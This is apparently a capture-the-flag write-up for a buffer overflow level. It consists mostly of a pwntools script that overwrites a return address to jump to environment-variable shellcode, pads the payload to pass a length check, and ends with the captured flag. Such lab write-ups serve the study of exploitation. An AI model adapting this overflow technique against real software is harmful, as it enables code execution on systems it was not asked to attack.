first we can see there is no protection, and also ASLR disabled.

in this level we do buffer overflow, but we also need to pass one check, this check: check that the len of the buffer answer on specific rule.

here you can find the shellcode shellcode.py

import sys
from pwn import *

junk_size = 65282+4

shellcode_address = 0xffffd542

payload = b'A' * junk_size
payload += p32(shellcode_address)

if (len(payload) & 0xffff) > 0x003f:
    payload += b'A' * (len(payload) & 0xffff - len(payload) + 0x10)

args = (str(len(payload))).encode() + b' ' + payload

sys.stdout.buffer.write(args)

, you need to change the address of the shellcode based on the address of your environment variable.

Flag: vY134qxapL